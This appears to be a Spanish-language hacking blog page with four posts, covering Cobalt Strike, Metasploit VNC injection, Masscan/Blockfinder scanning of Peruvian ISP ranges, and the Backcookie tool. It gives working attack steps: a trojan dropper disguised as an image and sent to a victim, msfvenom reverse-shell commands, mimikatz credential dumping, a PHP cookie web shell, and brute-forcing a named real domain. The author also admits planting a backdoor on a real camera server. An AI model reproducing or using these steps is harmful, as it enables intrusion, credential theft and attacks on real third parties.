HACKER ANGELWHITE GALC

domingo, 8 de noviembre de 2015

Cobalt Strike 3.0 La herramienta de Post-Explotación




Saludos mis fieles lectores en esta oportunidad les enseñare a utilizar Cobalt Strike en su ultima versión, según el autor data que la plataforma funciona mediante post-explotación y canales encubiertos para emular una tranquila explotación a largo plazo mediante el acto integrado en la red del cliente de igual manera permite cambiar sus indicadores de red para que parezca diferentes malware cada vez.

Estas herramientas complementan el proceso de Cobalt Strike sólidamente con la mano de la ingeniería social, su capacidad de colaboración es robusta, y los informes únicos son unicamente diseñados para ayudar a la formación del equipo.

La plataforma y sus complementos estándares tienen un costo.

¿Cuánto cuesta el Cobalt Strike?

Las nuevas licencias Cobalt Strike cuestan $ 3.500 por usuario para una licencia de un año. Renovación de licencias cuestan $ 2.500 por usuario al año.

Descarga:

https://www.cobaltstrike.com/trial

como vemos dejemos registrarnos para bajar la licencia key de la descarga si es que nos aceptan por la restricciones y unificado solamente para EE.UU, pero hay otra manera para poder descargarla.

https://www.cobaltstrike.com/download

Pero nos dice que debemos solicitar un trial para poder adquirir la licencia y que debemos ponernos en contacto con el siguiente correo electrónico sales@strategiccyber.com para solicitar un enlace de descarga directa para el PE.

Entonces podemos utilizar cualquier Proxy de anonimato con la IP de EE.UU para poder entrar al enlace de descarga de Cobalt Strike, existen muchos las cuales pueden utilizar y están en mi blog pueden buscar los artículos si lo desean, pero también existen "Proxys" que podemos utilizar mediante navegadores web mediante la configuración de red y paginas que se conectan en un proxy y cambiar nuestra IP específicamente en un servicio web pre terminado.

https://www.proxfree.com/proxy/

Ahora ya podemos acceder al formulario de descargarlo sin ningún problema o pueden descargarlo en el siguiente enlace:

http://www.mediafire.com/download/s9xz5pym8gt5i4w/cobaltstrike-trial.tgz

El trial de Cobalt Strike 3.0 tiene una valides de 21 días para ser usado, pero como esta en un lenguaje de código abierto, la licencia se a alterado en todas las versiones anteriores de dicha herramienta la cual podemos encontrar como crackearla sin tecnicismos en la red, en mi caso creo que no hay necesidad de llevar acabo dicho procedimiento.

Configurando cobalt strike

Abriremos la terminal, extraeremos el archivo de cobalstrike y por ultimo daremos permisos de ejecución a la carpeta

root@kali:~ tar -xvzf cobaltstrike-trial.tgz
root@kali~ cd cobaltstrike-trial
root@kali:~ chmod 775 *

Luego de ello vamos a ejecutar el archivo teamserver y añadiremos lo siguiente:


root@kali:~/cobaltstrike3.0# ls -la
root@kali:~/cobaltstrike3.0# ./teamserver 192.168.179.135 test
como vemos al ejecutar el teamserver añado mi ip 192.168.179.135 para establecer el servidor  y añadí la palabra test para definir la contraseña de la plataforma.

como vemos en la parte del trial ya había configurado los valores de 21 días a 99999999 días, también podemos observar nuestro certificado establecido en encriptacion SHA1, ahora pasaremos a ejecutar el Cobalt Strike.

root@kali:~/cobaltstrike3.0# ./cobaltstrike

al iniciar la herramienta nos aparece un aviso sobre el trial, ahora daremos aceptar, luego nos aparecerá un perfil del servidor, en usuario pueden añadir lo que deseen, y en password deben añadir la que pusieron al iniciar el teamserver en mi caso fue " test "

Luego de ello, nos aparece el key del servidor SSL del teamserver la cual le daremos SI para establecer la conexión a la plataforma de Cobalt strike. 

Entonces ya tenemos el servidor corriendo con la plataforma con éxito

Métodos de Post-Explotación 

Lo primero que haremos sera crear nuestro servidor de escucha para eso, entraremos en el icono de los "Audífonos", y le daremos clip en "ADD" y configuraremos lo siguiente:

Name: añadimos el nombre que le otorgaremos a nuestro servidor, en mi caso fue "prueba2"
Payload: dejaremos correr la conexión en "Windows" >> beacon_http >> reverse_http
Host: lo dejamos como esta, ya que es nuestra IP del servidor.
Port: nuestro puerta de escucha en mi caso lo deje en 8080.

Una ves que hallamos añadido nuestra configuración, le daremos en Save, luego de ello automáticamente nos saldrá el siguiente mensaje:

la cual nos dice que la conexión beacon HTTP  sera establecida con Cobalt Strike mediante nuestra IP, le daremos aceptar.
Como podemos notar ya tenemos nuestro servidor de escucha, ahora lo que haremos sera crear nuestro Payload en esta oportunidad lo haremos con un archivo de imagen para hacerlo mas ingenioso y muy creíble, lo que haremos sera dirigirnos a la barra de herramientas en la pestaña
"Attacks" > Packages > Windows Dropper 


Luego de ello nos aparecerá el primer cuadro la cual le añadiremos el nombre de la lista, en mi caso fue prueba1, rellenamos los datos luego de ello iremos a la opción "Embedded File" le daremos en la carpeta y escogeremos una imagen en mi caso fue esta :3


Luego que hallamos generado nuestro payload lo guardaremos con mismo nombre del archivo de imagen en mi caso se llama "sexy.jpg" y lo guardamos como "sexy.jpg.exe", la cual se ubicara e la carpeta "ROOT" - Carpeta Personal, ahora que ya tenemos nuestro archivo de imagen infectado, lo enviaremos a la victima :)

Una ves que nuestro victima aya abierto la imagen, automáticamente hemos explotado su sistema y podemos controlarlo desde nuestro plataforma de Cobalt Strike

Lo que haremos sera interactuar con plataforma al estilo de armitage, pero esta tiene mejores opciones que podamos imaginar, lo que haremos primero sera darle en el icono de la victima y dar en la opción "Interact"

 Luego le añadiremos el comando "help" para que nos aparezca una lista de comandos que podemos interactuar de acuerdo a nuestras necesidades.

En mi caso tecleare el comando "elevate", para establecer una conexión con el usuario administrativo del sistema mismo, nos aparecerá un cuadro la cual solamente señalamos la primera opcion y le damos "Choose"

Como vemos ya hemos explotado el sistema con la cual obtuvimos tener una sesiona con el usuario del sistema propio.


Si deseamos ver y controlar la maquina de la victima podemos añadir las siguientes opciones del Explore - Desktop VNC

de igual manera pueden ver los archivos del servidor para navegar libremente y tener privilegios de ver, descargar, subir, etc pueden entrar en la opción Explore - File Browser 


también podemos hacer un dump a al sistema para obtener credenciales con mimikatz para obtener tanto en texto plano como en hash, eso dependencia de los registros añadidos, en este caso me devolvió en texto plano mis credenciales de mi usuario de windows

User: Admin
Pass: Admin  

De igual manera pueden crear un archivo .exe legitimo, ahora haré la prueba en un windows 8.1 que tengo como sistema propio.

Como también pueden crear archivos maliciosos en Java applet, la configuración es sencilla, solo añaden el puerto de escucha para recibir las conexiones y enviamos el link infectado a la victima.  :)

Una ves que la victima aya aceptado que corra el script ya sabemos el resultado :)


Sin mas que decir, espero halla sido de su agrado este POST, como siempre agradecer a mis fieles lectores por su cariño de elegir este blog para sus fines educativos, Feliz Halloween!!





Gracias al aporte de Omar Rodriguez


VNC Remote Connection all Windows Operating Metasploit



Saludos fieles lectores en este oportunidad aprenderemos a como controlar un ordenador remotamente mediante msfconsole o metasploit  mediante una inyeccion payload VNC (Virtual Network computing), cuya función es controlar remotamente el ordenador comprometido y monitorearlo en vivo.













Referencia: https://es.wikipedia.org/wiki/VNC


Si desean pueden auditar o entrar a un servidor VNC por defauld, les daré un dork en shoudan

https://www.shodan.io/search?query=vnc+port%3A5901

PRIMER ESCENARIO: EXPLOTACIÓN 


EL primero paso de obtener acceso  a un ordenador, seria comprometerlo remotamente mediante ataques remotos o infecciones mediante payloads, dejare algunos POST donde enseño algunas técnicas para realizar algunas explotaciones.

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html
http://backtrack-omar.blogspot.pe/2015/10/unicorn-la-herramienta-de-infeccion.html
http://backtrack-omar.blogspot.pe/2015/10/winrar-nuestro-viejo-aliado-de.html
http://backtrack-omar.blogspot.pe/2015/09/2015-flash-0day-exploit-hackingteam.html
http://backtrack-omar.blogspot.pe/2015/03/las-viejas-macros-siempre-en-accion.html
http://backtrack-omar.blogspot.pe/2014/01/aprendiendo-metasploit-avanzado.html

no obstante existen mas métodos de infección y explotación que mas adelante añadiré al blog, pero creo que estos de aquí, les ayudara de mucho, lo primero que haré sera crear un payload ejecutable mediante msfvenom:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.179.129 LPORT=8080 -f exe > crack.exe


Luego de ello abriremos metasploit para activar nuestro servidor de escucha:

--------------------------------------------------------------------------------------------------------------------------
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.179.129
msf exploit(handler) > set lport 8080

msf exploit(handler) > exploit
--------------------------------------------------------------------------------------------------------------------------


el payload que hemos creado sera detectado por cualquier antivirus, si deseamos hacerlo indetectable pueden visitar mi siguiente POST:
http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html

enviaremos el ejecutable a nuestra victima y solamente esperaremos a que la victima ejecute el archivo para tener acceso al sistema.

Para que puedan entenderlo una ves que tengamos acceso a un sistema tendremos la sesión de acuerdo al orden numero de cada conexión, como el primero se le otorga "session 1"

Lo que haremos sera tener acceso remoto para ello inyectaremos un payload que se enfoca en este proceso, pero antes saldremos de meterpreter, sin cerrar la sesión con el comando "background" para añadir el payload:

meterpreter > background
[*] Backgrounding session 1...

--------------------------------------------------------------------------------------------------------------------------
msf exploit(handler) > use windows/manage/payload_inject
msf post(payload_inject) > set HANDLER true
msf post(payload_inject) > set LHOST 192.168.179.129
msf post(payload_inject) > set PAYLOAD windows/vncinject/reverse_tcp
msf post(payload_inject) > set SESSION 1
msf post(payload_inject) > run
-------------------------------------------------------------------------------------------------------------------------

Si vemos la imagen no hay necesidad de explicar cada modulo que se ejecuta, ya que se simplifica solo, una ves cargada la conexión automáticamente tendremos el acceso de escritorio remoto:

Este escenario se ejecuto en windows 7 , de igual manera funciona en windows 8, 8.1 y 10 una clara prueba de ello, les mostrare una imagen comprometiendo a un 8.1.

con esto tiene acceso a controlar el ordenador, desde su sistema.
Espero sea de su agrado mis lectores, sin mas que decir espero les aya gustado y hayan aprendido algo nuevo gracias a este servidor.

Gracias al aporte de mi amigo Omar Rodriguez

Auditando a nivel mundial con Masscan & Blockfinder




Saludos mis lectores en esta oportunidad les enseñare a como podemos auditar sistemas a nivel mundial por los rangos que las ISP otorgan a cada país, este POST lo quise elaborar hace aproximadamente hace mas de 1 año, pero motivos de tiempo y ocupaciones no me facilito hacerlo, pero hoy tengo el agrado de hacerlo publico, eh visto que la herramienta "Masscan" ya la han publicado en algunos vídeos  o foros pero con un contenido pobre, claro sin desprestigiar a mis colegas en sentido "ordinario", lo que haré yo sera innovar las investigaciones en adjuntar las herramientas  Masscan y Blockfinder, para globalizar nuestra investigación a un nivel de calidad mundial.


¿Que es Masscan?

Masscan es el escáner más rápido en en análisis de  puerto de Internet. es capaz de analizar la totalidad de Internet en menos de 6 minutos, la transmisión de 10 millones de paquetes por segundo.

Produce resultados similares a nmap el más famoso escáner de puertos.

literalmente funciona más como scanrand, unicornscan y zmap, utilizando la transmisión asíncrona. La principal diferencia es que es más rápido de estos otros escáneres. Además, es más flexible, permitiendo rangos de direcciones y rangos de puertos arbitrarios.

¿Que es Blockfinder?

Blockfinder permite identificar, contactar y potencialmente obtener cada red de computadoras en el mundo,  es una consola basada en un texto simple, esta herramienta envuelve una lista de bloques de red para un país determinado otorgando los rangos de IP que se utilizan en sus ISP.

Descarga:


https://github.com/robertdavidgraham/masscan
https://github.com/ioerror/blockfinder


Luego de haber leído la función de cada herramienta, pasemos a descargarlas ya sea manualmente o por la terminal, en mi caso lo haré por la terminal.

root@kali:~# git clone https://github.com/robertdavidgraham/masscan.git
root@kali:~# cd masscan

root@kali:~/masscan# chmod 775 *
root@kali:~/masscan# sudo apt-get install git gcc make libpcap-dev

lo primero que hice fue descargar el masscan, posteriormente ingresamos  la carpeta dimos los permisos de ejecución al modulo y luego de ello instale lipbcap, ya que necesitamos de dicho repositorio para que la herramienta  se ejecute sin ningún error.

Luego de ello pasaremos a instalarlo con el comando "make"




















Una ves hecho todos los procedimientos tendremos nuestro masscan corriendo perfectamente,antes de ejecutarlo pasaremos a descargar Blockfinder.

root@kali:~# git clone https://github.com/ioerror/blockfinder.git
root@kali:~# cd blockfinder
root@kali:~/blockfinder# chmod 775 *
root@kali:~/blockfinder# ./blockfinder.py -i
Como vimos de igual manera lo descargamos, entramos al directorio, dimos permisos en el modulo pero al ejecutarlo ./blockfinder.py -i , la sentencia -i actualiza los paquetes de rangos relacionados a cada código ISO de cada País, la cual beneficiaria esta herramienta para tener un buen resultado.

Códigos ISO

http://www.solunix.es/help/img/help_gestion/paisiso_1.pdf


Una ves entendido lo siguiente, pasaremos a obtener los rangos de IP de un país, en mi caso buscare el de Perú para esta prueba de concepto.

root@kali:~/blockfinder# ./blockfinder.py -v -t PE

Para ver el análisis completo puede ingresar al siguiente link:  https://ghostbin.com/paste/8g75c
una ves obtenido los rangos pasaremos a escoger un RANGO que deseemos, en mi caso fue el siguiente: 190.187.128.0/17

ahora pasaremos a ingresar al masscan para analizar el rango especifico y puertos que deseemos capturar en mi caso, sera el 445 que es vulnerable a muchos ataques como el conocido exploit Netapi, por msfconsole, de igual manera podemos ubicar puertos referentes a FTP,SMTP, entre muchos los cuales tengan como objetivo.

como vemos nos arroja una lista el escaneo y vemos que esta empezando a escanear 32769 equipos que están en proceso de análisis, si deseamos guardarlo en un archivo podemos hacerlo de la siguiente manera:

 root@kali:~/masscan/bin# ./masscan -p445 190.187.128.0/17 -oX scan.xml

en mi caso yo lo deje como opcional llame el archivo scan con la extensión .xml.

el archivo se encuentra alojado en la carpeta donde ejecutaron el masscan con el nombre que asignaron en mi caso scan.xml

En nuestro caso podemos escoger una IP y analizarlo con el buscador Shoudan para ver los servicios que consta dicho sistema:
https://www.shodan.io/host/190.187.142.83


como vemos armitage puede ser utilizado NO solamente para ataques locales, si no también para ataques remotos uno puedo añadir una lista de IP para proceder a escanear y lanzar el Hail Mary para explotar de manera automática algunos sistemas mientras puede estar ejecutando otra cosa a la vez.

en mi caso yo hace 3 días atrás hice una explotación por telnet a un servidor de cámaras las cuales pueden ver en la siguiente imagen:

En mi caso yo explote un servidor Telnet, con el puerto 23 y deje un backdoor dentro, por seguridad solo muestro el panel de acceso ARRIS.

en mi caso encontré una IP relacionado a una web la cual fue : bembos.com.pe, entonces si uno desea auditar ese sistema web con un ataque de fuerza bruta puede hacerlo con la herramienta "BruteX"

https://github.com/1N3/BruteX

root@kali:~/BruteX# ./brutex bembos.com.pe


Buena información verdad?, sinceramente en este POST no enseñare como explotar algunos sistemas por motivos de ética profesional, aparte expandiera el articulo en algo que se puede encontrar por uno mismo, esto fue todo amigos, Gracias por ver este post de este humilde servidor

Backcookie la herramienta de conexión remota

Saludos mis fieles lectores, en esta oportunidad vamos a modernizarnos para dejar atrás las webshells, que en su mayoría ya están quemadas por algunos antivirus y firewalls que puede tener un servidor web,dando  entrada a Backcookie  una herramienta escrita en python la cual tiene como función tener conexiones entrantes de servidores web mediante cookies, vayamos a la acción
Good By Backdoors detectable.

¿Que es una Cookie?  

Las cookies son un mecanismo por el que se almacenan datos en el navegador remoto para monitorizar o identificar a los usuarios que vuelvan al sito web.

referencia: http://php.net/manual/es/features.cookies.php


Lo que haremos sera descargar la herramienta Backcokkie, luego de ello pasaremos a extraerlo
root@kali:~# wget https://github.com/jofpin/backcookie/archive/master.zip 

Antes de comenzar deseo mandar un saludo  para un buen hermano mio, "Fraph Core" que el día de hoy esta cumpliendo un año mas de vida, por este motivo realizo este post, ya que la herramienta es creada por el y es la forma mas oportuna de hacerlo.
Feliz cumpleaños hermano!!

Iniciando la herramienta

Antes que nada podemos observar como funciona la herramienta, de acuerdo al autor funciona de dos maneras :

  • Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
  • Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Métodos de subir el código de conexión  

Source:

<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>



El primer método en un servidor VPS 

sera crear un archivo .php añadiendo el codigo y subirlo al servidor web.

El segundo método 

seria añadir el código en archivo del servidor web, mediante una webshell.

Estos métodos serian los que podan utilizar ustedes,mas abajo les tengo una sorpresa cual método yo  me ingenie para hacerlo aun mas confidencial.

entonces una ves añadido nuestro código, pasaremos ejecutarlo:




Como podemos observar el dominio comprometido es un servidor privado (VPS), la cual tenemos acceso al sistema del servidor, la cual podemos subir nuestros payload de meterpreter,archivos RAT,o los que ustedes deseen, en mi caso les enseñare a utilizar esta herramienta de manera estándar, en este servidor VPS en Windows como prueba de concepto.

Lo que haremos sera ejecutar el comando CMD

como vemos hemos tenido acceso a la interprete de comandos de windows, lo que podemos hacer ahora es ejecutar los comandos que utilizamos siempre, en mi caso haré un mapeo de todas las IP'S conectadas al servidor, en este caso todos los demás servicios privados.

como podemos observar nos arroja las IP'S conectadas la cual podemos aprovecharlas para auditarlas y explotarlas mediante metasploit, o subir un archivo RAT y capturar todos los datos del servidor, por mi parte no lo haré, por motivos de ética, de igual manera podemos ver el tipo de servicio del router como veremos aquí:


Paremos a entrar a otro servidor web, en este caso el siguiente:

Como vemos es un servidor en Linux la cual, podemos interactuar con ella, sin mas que decir doy como culminado este POST, espero les aya gustado demasiado la herramienta Backcookie, ya que llevo casi un año utilizando esta gran herramienta y lo hago publico porque eh visto que hay "Personas" que han modificado el nombre del autor y han estado ripiandola :/

Ante mano un saludo mis estimados!